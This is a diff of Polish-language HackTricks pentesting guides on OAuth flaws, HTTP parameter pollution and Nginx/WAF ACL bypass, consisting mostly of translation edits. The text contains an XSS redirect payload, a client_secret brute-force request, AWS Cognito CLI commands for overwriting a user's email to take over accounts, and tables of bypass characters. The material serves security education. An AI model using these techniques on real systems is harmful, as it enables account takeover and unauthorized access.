@ -56,7 +56,7 @@ https://socialmedia.com/auth
&scope=readPosts
&state=randomString123
```
3. Następnie zostajesz poproszony o wyrażenie zgody.
3. Następnie zostajesz poproszony o zgodę na dostęp.
4. Po udzieleniu zgody, Media Społecznościowe wysyła odpowiedź do `redirect_uri` z parametrami `code` i `state`:
```
@ -70,17 +70,17 @@ Host: socialmedia.com
```
6. Ostatecznie proces kończy się, gdy https://example.com wykorzystuje Twój `access_token` do wykonania wywołania interfejsu API do mediów społecznościowych w celu uzyskania dostępu
## Luki <a href="#323a" id="323a"></a>
## Vulnerabilities <a href="#323a" id="323a"></a>
### Otwarte przekierowanie `redirect_uri` <a href="#cc36" id="cc36"></a>
### Otwarte przekierowanie\_uri <a href="#cc36" id="cc36"></a>
`redirect_uri` jest kluczowy dla bezpieczeństwa w implementacjach OAuth i OpenID, ponieważ określa, dokąd są wysyłane wrażliwe dane, takie jak kody autoryzacyjne, po autoryzacji. W przypadku błędnej konfiguracji, może umożliwić atakującym przekierowanie tych żądań do złośliwych serwerów, umożliwiając przejęcie konta.
`redirect_uri` jest kluczowy dla bezpieczeństwa w implementacjach OAuth i OpenID, ponieważ określa, gdzie po autoryzacji są wysyłane wrażliwe dane, takie jak kody autoryzacyjne. W przypadku błędnej konfiguracji, może umożliwić atakującym przekierowanie tych żądań do złośliwych serwerów, umożliwiając przejęcie konta.
Techniki eksploatacji różnią się w zależności od logiki walidacji serwera autoryzacyjnego. Mogą one obejmować od dokładnego dopasowania ścieżki do akceptowania dowolnego adresu URL w określonej domenie lub podkatalogu. Powszechne metody eksploatacji obejmują otwarte przekierowania, nawigację ścieżką, wykorzystywanie słabych wyrażeń regularnych oraz wstrzykiwanie HTML w celu kradzieży tokena.
Techniki eksploatacji różnią się w zależności od logiki walidacji serwera autoryzacyjnego. Mogą one obejmować od dokładnego dopasowania ścieżki do akceptowania dowolnego adresu URL w określonej domenie lub podkatalogu. Powszechne metody eksploatacji obejmują otwarte przekierowania, nawigację ścieżką, wykorzystywanie słabych wyrażeń regularnych oraz wstrzykiwanie HTML w celu kradzieży tokenów.
Oprócz `redirect_uri`, inne parametry OAuth i OpenID, takie jak `client_uri`, `policy_uri`, `tos_uri` i `initiate_login_uri`, są również podatne na ataki przekierowania. Te parametry są opcjonalne, a ich obsługa różni się w zależności od serwerów.
Dla osób celujących w serwer OpenID, punkt końcowy odkrywania (`**.well-known/openid-configuration**`) często zawiera cenne szczegóły konfiguracji, takie jak `registration_endpoint`, `request_uri_parameter_supported` i "`require_request_uri_registration`. Te szczegóły mogą pomóc w identyfikacji punktu końcowego rejestracji i innych szczegółów konfiguracji serwera.
Dla tych, którzy celują w serwer OpenID, punkt końcowy odkrywania (`**.well-known/openid-configuration**`) często zawiera cenne szczegóły konfiguracji, takie jak `registration_endpoint`, `request_uri_parameter_supported` i "`require_request_uri_registration`. Te szczegóły mogą pomóc zidentyfikować punkt końcowy rejestracji i inne konkretne konfiguracje serwera.
### XSS w implementacji przekierowania <a href="#bda5" id="bda5"></a>
@ -88,32 +88,32 @@ Jak wspomniano w tym raporcie z programu bug bounty [https://blog.dixitaditya.co
```
https://app.victim.com/login?redirectUrl=https://app.victim.com/dashboard</script><h1>test</h1>
```
### CSRF - Niewłaściwe przetwarzanie parametru stanu <a href="#bda5" id="bda5"></a>
### CSRF - Niewłaściwe obchodzenie parametru stanu <a href="#bda5" id="bda5"></a>
W implementacjach OAuth, nadużycie lub pominięcie parametru **`state`** może znacząco zwiększyć ryzyko ataków typu **Cross-Site Request Forgery (CSRF)**. Ta podnośność pojawia się, gdy parametr `state` jest albo **nie używany, używany jako wartość statyczna, albo nieprawidłowo zweryfikowany**, co pozwala atakującym ominąć zabezpieczenia CSRF.
W implementacjach OAuth, nadużycie lub pominięcie parametru **`state`** może znacząco zwiększyć ryzyko ataków typu **Cross-Site Request Forgery (CSRF)**. Ta podatność pojawia się, gdy parametr `state` jest albo **nie używany, używany jako wartość statyczna, albo nieprawidłowo zweryfikowany**, co pozwala atakującym ominąć zabezpieczenia CSRF.
Atakujący mogą wykorzystać to, przechwytując proces autoryzacji, aby połączyć swoje konto z kontem ofiary, co prowadzi do potencjalnego **przejęcia konta**. Jest to szczególnie krytyczne w aplikacjach, gdzie OAuth jest używany do **celów uwierzytelniania**.
Atakujący mogą wykorzystać to, przechwytując proces autoryzacji, aby połączyć swoje konto z kontem ofiary, co prowadzi do potencjalnego **przejęcia konta**. Jest to szczególnie krytyczne w aplikacjach, gdzie OAuth jest używany do celów **uwierzytelniania**.
Przykłady tej podatności w rzeczywistym świecie zostały udokumentowane w różnych **wyzwaniach CTF** i **platformach do hakowania**, podkreślając jej praktyczne implikacje. Problem ten dotyczy również integracji z usługami osób trzecich, takimi jak **Slack**, **Stripe** i **PayPal**, gdzie atakujący mogą przekierować powiadomienia lub płatności na swoje konta.
Prawidłowe przetwarzanie i weryfikacja parametru **`state`** są kluczowe dla ochrony przed CSRF i zabezpieczenia przepływu OAuth.
Prawidłowe obchodzenie i weryfikacja parametru **`state`** są kluczowe dla ochrony przed CSRF i zabezpieczenia przepływu OAuth.
### Przed Przejęciem Konta <a href="#ebe4" id="ebe4"></a>
1. **Bez Weryfikacji Email podczas Tworzenia Konta**: Atakujący mogą uprzednio utworzyć konto, używając adresu e-mail ofiary. Jeśli ofiara później użyje usługi osób trzecich do logowania, aplikacja może nieumyślnie połączyć to konto osób trzecich z wcześniej utworzonym kontem atakującego, co prowadzi do nieautoryzowanego dostępu.
1. **Bez Weryfikacji Emaila podczas Tworzenia Konta**: Atakujący mogą uprzednio utworzyć konto, używając emaila ofiary. Jeśli ofiara później użyje usługi osób trzecich do logowania, aplikacja może nieumyślnie połączyć to konto osób trzecich z wcześniej utworzonym kontem atakującego, co prowadzi do nieautoryzowanego dostępu.
2. **Wykorzystanie Luźnej Weryfikacji Email w OAuth**: Atakujący mogą wykorzystać usługi OAuth, które nie weryfikują adresów e-mail, rejestrując się w ich usłudze, a następnie zmieniając adres e-mail konta na adres ofiary. Ta metoda podobnie niesie ryzyko nieautoryzowanego dostępu do konta, podobnie jak w pierwszym scenariuszu, ale poprzez inny wektor ataku.
2. **Wykorzystanie Luźnej Weryfikacji Emaili w OAuth**: Atakujący mogą wykorzystać usługi OAuth, które nie weryfikują emaili, rejestrując się w ich usłudze, a następnie zmieniając email konta na email ofiary. Ta metoda podobnie niesie ryzyko nieautoryzowanego dostępu do konta, podobnie jak w pierwszym scenariuszu, ale poprzez inny wektor ataku.
### Ujawnienie Sekretów <a href="#e177" id="e177"></a>
Identyfikacja i ochrona tajnych parametrów OAuth są kluczowe. Podczas gdy **`client_id`** można bezpiecznie ujawnić, ujawnienie **`client_secret`** niesie ze sobą znaczne ryzyko. Jeśli `client_secret` zostanie skompromitowany, atakujący mogą wykorzystać tożsamość i zaufanie aplikacji do **kradzieży `access_tokens`** oraz prywatnych informacji.
Powszechną podatnością jest sytuacja, gdy aplikacje błędnie obsługują wymianę kodu autoryzacji na `access_token` po stronie klienta, a nie po stronie serwera. Ten błąd prowadzi do ujawnienia `client_secret`, umożliwiając atakującym generowanie `access_tokens` pod przykrywką aplikacji. Ponadto, poprzez inżynierię społeczną, atakujący mogą eskalować uprawnienia, dodając dodatkowe zakresy autoryzacji OAuth, dalsze wykorzystując zaufane status aplikacji.
Powszechna podatność pojawia się, gdy aplikacje błędnie obsługują wymianę kodu autoryzacji na `access_token` po stronie klienta, a nie po stronie serwera. Ten błąd prowadzi do ujawnienia `client_secret`, umożliwiając atakującym generowanie `access_tokens` pod przykrywką aplikacji. Ponadto, poprzez inżynierię społeczną, atakujący mogą eskalować uprawnienia, dodając dodatkowe zakresy autoryzacji OAuth, dalsze wykorzystując zaufane status aplikacji.
### Bruteforce Sekretu Klienta
Możesz spróbować **przeprowadzić atak bruteforce na client\_secret** dostawcy usług z dostawcą tożsamości, aby próbować kraść konta.\
Żądanie do BF może wyglądać podobnie do:
Żądanie do BF może wyglądać podobnie jak:
```
POST /token HTTP/1.1
content-type: application/x-www-form-urlencoded
@ -123,19 +123,19 @@ Connection: close
code=77515&redirect_uri=http%3A%2F%2F10.10.10.10%3A3000%2Fcallback&grant_type=authorization_code&client_id=public_client_id&client_secret=[bruteforce]
```
### Wyciek nagłówka Referer z kodem + stanem
### Referer Header wycieka Kod + Stan
Kiedy klient ma **kod i stan**, jeśli jest **odzwierciedlony w nagłówku Referer** podczas przeglądania innej strony, to jest podatny.
### Token dostępu przechowywany w historii przeglądarki
Przejdź do **historii przeglądarki i sprawdź, czy token dostępu jest zapisany tam**.
Przejdź do **historii przeglądarki i sprawdź, czy token dostępu jest tam zapisany**.
### Wieczny kod autoryzacyjny
**Kod autoryzacyjny powinien istnieć tylko przez pewien czas, aby ograniczyć okno czasowe, w którym atakujący może go ukraść i użyć**.
Kod **autoryzacyjny powinien istnieć tylko przez pewien czas, aby ograniczyć okno czasowe, w którym atakujący może go ukraść i użyć**.
### Token autoryzacji/odświeżania niezwiązany z klientem
### Token autoryzacji/Odświeżania niezwiązany z klientem
Jeśli możesz uzyskać **kod autoryzacyjny i użyć go z innym klientem, to możesz przejąć inne konta**.
@ -145,7 +145,7 @@ Jeśli możesz uzyskać **kod autoryzacyjny i użyć go z innym klientem, to mo
### AWS Cognito <a href="#bda5" id="bda5"></a>
W tym raporcie z programu bug bounty: [**https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/**](https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/) możesz zobaczyć, że **token**, który **AWS Cognito** zwraca użytkownikowi, może mieć **wystarczające uprawnienia do nadpisania danych użytkownika**. Dlatego jeśli możesz **zmienić adres e-mail użytkownika na inny adres e-mail**, możesz **przejąć** inne konta.
W tym raporcie z programu bug bounty: [**https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/**](https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/) możesz zobaczyć, że **token**, który **AWS Cognito** zwraca użytkownikowi, może mieć **wystarczające uprawnienia do nadpisania danych użytkownika**. Dlatego jeśli możesz **zmienić adres e-mail użytkownika na inny adres e-mail**, możesz **przejąć** konta innych osób.
```bash
# Read info of the user
aws cognito-idp get-user --region us-east-1 --access-token eyJraWQiOiJPVj[...]
@ -162,60 +162,64 @@ aws cognito-idp update-user-attributes --region us-east-1 --access-token eyJraWQ
]
}
```
Dla bardziej szczegółowych informacji na temat nadużywania AWS Cognito sprawdź:
{% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum" %}
### Nadużywanie tokenów innych aplikacji <a href="#bda5" id="bda5"></a>
Jak [**wspomniano w tym opracowaniu**](https://salt.security/blog/oh-auth-abusing-oauth-to-take-over-millions-of-accounts), przepływy OAuth, które oczekują otrzymania **tokena** (a nie kodu), mogą być podatne, jeśli nie sprawdzają, czy token należy do aplikacji.
To dlatego, że **atakujący** mógłby stworzyć **aplikację obsługującą OAuth i zalogować się przez Facebooka** (na przykład) w swojej własnej aplikacji. Następnie, gdy ofiara zaloguje się przez Facebooka w **aplikacji atakującego**, atakujący mógłby uzyskać **token OAuth użytkownika udzielony jego aplikacji i użyć go do zalogowania się w aplikacji OAuth ofiary, korzystając z tokenu użytkownika ofiary**.
Dzieje się tak, ponieważ **atakujący** mógłby stworzyć **aplikację obsługującą OAuth i zalogować się przez Facebooka** (na przykład) w swojej własnej aplikacji. Następnie, gdy ofiara zaloguje się przez Facebooka w **aplikacji atakującego**, atakujący mógłby uzyskać **token OAuth użytkownika udzielony jego aplikacji i użyć go do zalogowania się w aplikacji OAuth ofiary, korzystając z tokenu użytkownika ofiary**.
{% hint style="danger" %}
Dlatego jeśli atakujący zdoła zdobyć dostęp użytkownika do swojej własnej aplikacji OAuth, będzie mógł przejąć konto ofiary w aplikacjach, które oczekują tokenu i nie sprawdzają, czy token został udzielony dla ich identyfikatora aplikacji.
Dlatego jeśli atakujący zdoła namówić użytkownika do udzielenia dostępu do swojej własnej aplikacji OAuth, będzie mógł przejąć konto ofiary w aplikacjach, które oczekują tokenu i nie sprawdzają, czy token został udzielony dla ich identyfikatora aplikacji.
{% endhint %}
### Dwa linki i ciasteczko <a href="#bda5" id="bda5"></a>
Zgodnie z [**tym opracowaniem**](https://medium.com/@metnew/why-electron-apps-cant-store-your-secrets-confidentially-inspect-option-a49950d6d51f), było możliwe, aby sprawić, że ofiara otworzy stronę z **returnUrl** wskazującą na host atakującego. Te informacje byłyby **przechowywane w ciasteczku (RU)**, a w **późniejszym kroku** **prompt** zapyta **użytkownika**, czy chce dać dostęp do tego hosta atakującego.
Zgodnie z [**tym opracowaniem**](https://medium.com/@metnew/why-electron-apps-cant-store-your-secrets-confidentially-inspect-option-a49950d6d51f), było możliwe, aby sprawić, że ofiara otworzy stronę z **returnUrl** wskazującą na host atakującego. Te informacje byłyby **przechowywane w ciasteczku (RU)**, a w **późniejszym kroku** **prompt** zapyta **użytkownika**, czy chce udzielić dostępu do tego hosta atakującego.
Aby ominąć ten prompt, można było otworzyć kartę, aby zainicjować **przepływ OAuth**, który ustawiałby to ciasteczko RU, używając **returnUrl**, zamknąć kartę przed pokazaniem się promptu i otworzyć nową kartę bez tej wartości. Wtedy **prompt nie poinformuje o hoście atakującego**, ale ciasteczko zostanie ustawione na niego, więc **token zostanie wysłany do hosta atakującego** w przekierowaniu.
Aby ominąć ten prompt, można było otworzyć kartę, aby zainicjować **przepływ OAuth**, który ustawiłby to ciasteczko RU, używając **returnUrl**, zamknąć kartę przed pokazaniem się promptu i otworzyć nową kartę bez tej wartości. Następnie **prompt nie poinformuje o hoście atakującego**, ale ciasteczko zostanie ustawione na niego, więc **token zostanie wysłany do hosta atakującego** w przekierowaniu.
### Parametry SSRF <a href="#bda5" id="bda5"></a>
**[Sprawdź tę analizę](https://portswigger.net/research/hidden-oauth-attack-vectors) dla dalszych szczegółów tej techniki.**
Dynamiczna Rejestracja Klienta w OAuth służy jako mniej oczywisty, ale krytyczny wektor podatności na bezpieczeństwo, w szczególności dla ataków **Server-Side Request Forgery (SSRF)**. Ten punkt końcowy pozwala serwerom OAuth otrzymywać szczegóły dotyczące aplikacji klienta, w tym wrażliwe adresy URL, które mogą być wykorzystane.
Dynamiczna rejestracja klienta w OAuth służy jako mniej oczywisty, ale krytyczny wektor podatności na bezpieczeństwo, w szczególności dla ataków typu **Server-Side Request Forgery (SSRF)**. Ten punkt końcowy pozwala serwerom OAuth otrzymywać szczegóły dotyczące aplikacji klienta, w tym wrażliwe adresy URL, które mogą być wykorzystane.
**Kluczowe punkty:**
- **Dynamiczna Rejestracja Klienta** jest często mapowana na `/register` i akceptuje szczegóły takie jak `client_name`, `client_secret`, `redirect_uris` oraz adresy URL do logotypów lub zestawów kluczy JSON Web Key (JWKs) za pomocą żądań POST.
- Dynamiczna rejestracja klienta jest często mapowana na `/register` i akceptuje szczegóły takie jak `client_name`, `client_secret`, `redirect_uris` oraz adresy URL do logotypów lub zestawów kluczy JSON Web Key (JWKs) za pomocą żądań POST.
- Ta funkcja przestrzega specyfikacji określonych w **RFC7591** i **OpenID Connect Registration 1.0**, które obejmują parametry potencjalnie podatne na SSRF.
- Proces rejestracji może nieumyślnie narazić serwery na SSRF na kilka sposobów:
- **`logo_uri`**: Adres URL logotypu aplikacji klienta, który może być pobrany przez serwer, wywołując SSRF lub prowadząc do XSS, jeśli adres URL jest źle obsługiwany.
- **`jwks_uri`**: Adres URL do dokumentu JWK klienta, który w przypadku złośliwego opracowania może spowodować, że serwer wyśle żądania do serwera kontrolowanego przez atakującego.
- **`logo_uri`**: Adres URL logotypu aplikacji klienta, który może zostać pobrany przez serwer, wywołując SSRF lub prowadząc do XSS, jeśli adres URL jest źle obsługiwany.
- **`jwks_uri`**: Adres URL do dokumentu JWK klienta, który w przypadku złośliwego opracowania może sprawić, że serwer wyśle żądania do serwera kontrolowanego przez atakującego.
- **`sector_identifier_uri`**: Odwołuje się do tablicy JSON `redirect_uris`, którą serwer może pobrać, tworząc okazję do SSRF.
- **`request_uris`**: Wylicza dozwolone adresy URI żądań dla klienta, które mogą być wykorzystane, jeśli serwer pobiera te adresy URI na początku procesu autoryzacji.
**Strategia Wykorzystania:**
**Strategia eksploatacji:**
- SSRF może zostać wywołane poprzez zarejestrowanie nowego klienta z złośliwymi adresami URL w parametrach takich jak `logo_uri`, `jwks_uri` lub `sector_identifier_uri`.
- Podczas gdy bezpośrednie wykorzystanie poprzez `request_uris` może być ograniczone przez kontrole białej listy, dostarczenie wcześniej zarejestrowanego, kontrolowanego przez atakującego `request_uri` może ułatwić SSRF podczas fazy autoryzacji.
- Podczas gdy bezpośrednia eksploatacja za pomocą `request_uris` może być ograniczona przez kontrole białej listy, dostarczenie wcześniej zarejestrowanego, kontrolowanego przez atakującego `request_uri` może ułatwić SSRF podczas fazy autoryzacji.
## Wyścig dostawców OAuth
## Warunki wyścigowe dostawców OAuth
Jeśli platforma, którą testujesz, jest dostawcą OAuth, [**przeczytaj to, aby przetestować możliwe wyścigi**](race-condition.md).
Jeśli platforma, którą testujesz, jest dostawcą OAuth, [**przeczytaj to, aby przetestować możliwe warunki wyścigowe**](race-condition.md).
## Referencje
## Odnośniki
* [**https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1**](https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1)
* [**https://portswigger.net/research/hidden-oauth-attack-vectors**](https://portswigger.net/research/hidden-oauth-attack-vectors)
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
<details>
<summary><strong>Naucz się hakować AWS od zfszero do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Inne sposoby wsparcia HackTricks:

24
pentesting-web/parameter-pollution.md
View file

@ -2,7 +2,7 @@
<details>
<summary><strong>Nauka hakowania AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Inne sposoby wsparcia HackTricks:
@ -10,18 +10,18 @@ Inne sposoby wsparcia HackTricks:
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakowania, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytoriów na GitHubie.
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytoriów na GitHubie.
</details>
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
# Przegląd zanieczyszczenia parametru HTTP (HPP)
Zanieczyszczenie parametru HTTP (HPP) to technika, w której atakujący manipulują parametrami HTTP, zmieniając zachowanie aplikacji internetowej w niezamierzony sposób. Ta manipulacja polega na dodawaniu, modyfikowaniu lub duplikowaniu parametrów HTTP. Skutki tych manipulacji nie są bezpośrednio widoczne dla użytkownika, ale mogą znacząco zmienić funkcjonalność aplikacji po stronie serwera, z obserwowalnymi skutkami po stronie klienta.
Zanieczyszczenie parametru HTTP (HPP) to technika, w której atakujący manipulują parametrami HTTP, zmieniając zachowanie aplikacji internetowej w niezamierzone sposoby. Ta manipulacja polega na dodawaniu, modyfikowaniu lub duplikowaniu parametrów HTTP. Efekt tych manipulacji nie jest bezpośrednio widoczny dla użytkownika, ale może znacząco zmienić funkcjonalność aplikacji po stronie serwera, z obserwowalnymi skutkami po stronie klienta.
## Przykład zanieczyszczenia parametru HTTP (HPP)
@ -35,7 +35,7 @@ Poprzez dodanie dodatkowego parametru `from`:
Transakcja może zostać błędnie obciążona na rzecz `accountC` zamiast `accountA`, co pokazuje potencjał HPP do manipulowania transakcjami lub innymi funkcjonalnościami, takimi jak resetowanie hasła, ustawienia 2FA lub żądania klucza API.
### **Analiza parametrów specyficzna dla technologii**
### **Analiza parametrów specyficznych dla technologii**
- Sposób analizowania i priorytetyzowania parametrów zależy od zastosowanej technologii internetowej, wpływając na sposób eksploatacji HPP.
- Narzędzia takie jak [Wappalyzer](https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/) pomagają zidentyfikować te technologie i ich zachowania analizy.
@ -46,13 +46,13 @@ Transakcja może zostać błędnie obciążona na rzecz `accountC` zamiast `acco
- **Kontekst:** Mechanizm logowania wymagający jednorazowego hasła (OTP) został wykorzystany.
- **Metoda:** Poprzez przechwycenie żądania OTP za pomocą narzędzi takich jak Burp Suite, atakujący zduplikowali parametr `email` w żądaniu HTTP.
- **Wynik:** OTP, przeznaczone dla początkowego adresu e-mail, zostało wysłane na drugi adres e-mail określony w zmanipulowanym żądaniu. Ta luka umożliwiła nieautoryzowany dostęp poprzez obejście zamierzonego środka bezpieczeństwa.
- **Wynik:** OTP, przeznaczone dla początkowego adresu e-mail, zostało wysłane na drugi adres e-mail określony w zmanipulowanym żądaniu. Ta wada umożliwiła nieautoryzowany dostęp poprzez obejście zamierzonego środka bezpieczeństwa.
Ten scenariusz podkreśla istotny błąd w backendzie aplikacji, który przetwarzał pierwszy parametr `email` do generowania OTP, ale użył ostatniego do dostarczenia.
Ten scenariusz podkreśla istotny błąd w backendzie aplikacji, który przetwarzał pierwszy parametr `email` do generowania OTP, ale używał ostatniego do dostarczenia.
**Przypadek manipulacji klucza API:**
- **Scenariusz:** Aplikacja umożliwia użytkownikom aktualizację swojego klucza API za pomocą strony ustawień profilu.
- **Scenariusz:** Aplikacja pozwala użytkownikom aktualizować swój klucz API za pomocą strony ustawień profilu.
- **Wektor ataku:** Atakujący odkrywa, że dodając dodatkowy parametr `api_key` do żądania POST, może manipulować wynikiem funkcji aktualizacji klucza API.
- **Technika:** Korzystając z narzędzia takiego jak Burp Suite, atakujący tworzy żądanie, które zawiera dwa parametry `api_key`: jeden legalny i jeden złośliwy. Serwer, przetwarzając tylko ostatnie wystąpienie, aktualizuje klucz API do wartości podanej przez atakującego.
- **Wynik:** Atakujący uzyskuje kontrolę nad funkcjonalnością API ofiary, potencjalnie uzyskując dostęp lub modyfikując prywatne dane nieautoryzowane.
@ -64,20 +64,20 @@ Ten przykład dodatkowo podkreśla konieczność bezpiecznego przetwarzania para
Sposób obsługi duplikowanych parametrów HTTP różni się w zależności od technologii internetowych, wpływając na podatność na ataki HPP:
- **Flask:** Przyjmuje wartość pierwszego parametru napotkanego, takiego jak `a=1` w ciągu zapytania `a=1&a=2`, priorytetyzując początkowe wystąpienie nad kolejnymi duplikatami.
- **PHP (na serwerze Apache HTTP):** W przeciwieństwie do tego, priorytetyzuje ostatnią wartość parametru, wybierając `a=2` w podanym przykładzie. To zachowanie może niechcący ułatwić eksploatację HPP, honorując zmanipulowany parametr atakującego ponad oryginalny.
- **PHP (na serwerze Apache HTTP):** W przeciwieństwie do tego, priorytetyzuje wartość ostatniego parametru, wybierając `a=2` w podanym przykładzie. To zachowanie może niechcący ułatwić eksploatację HPP, honorując zmanipulowany parametr atakującego ponad oryginalny.
## Odnośniki
* [https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654](https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654)
* [https://github.com/google/google-ctf/tree/master/2023/web-under-construction/solution](https://github.com/google/google-ctf/tree/master/2023/web-under-construction/solution)
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
<details>
<summary><strong>Nauka hakowania AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Inne sposoby wsparcia HackTricks:
@ -85,6 +85,6 @@ Inne sposoby wsparcia HackTricks:
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakowania, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytoriów na GitHubie.
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytoriów na GitHubie.
</details>

32
pentesting-web/proxy-waf-protections-bypass.md
View file

@ -1,4 +1,4 @@
# Bypass Ochrony Proxy / WAF
# Bypass zabezpieczeń Proxy / WAF
<details>
@ -7,18 +7,18 @@
Inne sposoby wsparcia HackTricks:
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Kup [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**Grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Podziel się swoimi sztuczkami hakowania, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) na GitHubie.
</details>
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
## Bypass Reguł ACL Nginx za pomocą Manipulacji Ścieżką <a href="#heading-pathname-manipulation-bypassing-reverse-proxies-and-load-balancers-security-rules" id="heading-pathname-manipulation-bypassing-reverse-proxies-and-load-balancers-security-rules"></a>
## Bypass reguł ACL Nginx za pomocą manipulacji ścieżką <a href="#heading-pathname-manipulation-bypassing-reverse-proxies-and-load-balancers-security-rules" id="heading-pathname-manipulation-bypassing-reverse-proxies-and-load-balancers-security-rules"></a>
Techniki [z tej publikacji](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies).
@ -32,11 +32,9 @@ location = /admin/ {
deny all;
}
```
Aby zapobiec bypassom, Nginx wykonuje normalizację ścieżki przed jej sprawdzeniem. Jednakże, jeśli serwer backendowy wykonuje inną normalizację (usuwanie znaków, których Nginx nie usuwa), może być możliwe obejście tej obrony.
### **NodeJS - Express**
| Wersja Nginx | **Znaki do obejścia w Node.js** |
| Wersja Nginx | **Znaki Bypass Node.js** |
| ------------- | ----------------------------- |
| 1.22.0 | `\xA0` |
| 1.21.6 | `\xA0` |
@ -46,7 +44,7 @@ Aby zapobiec bypassom, Nginx wykonuje normalizację ścieżki przed jej sprawdze
### **Flask**
| Wersja Nginx | **Znaki do obejścia w Flask** |
| Wersja Nginx | **Znaki Bypass Flask** |
| ------------- | -------------------------------------------------------------- |
| 1.22.0 | `\x85`, `\xA0` |
| 1.21.6 | `\x85`, `\xA0` |
@ -56,7 +54,7 @@ Aby zapobiec bypassom, Nginx wykonuje normalizację ścieżki przed jej sprawdze
### **Spring Boot**
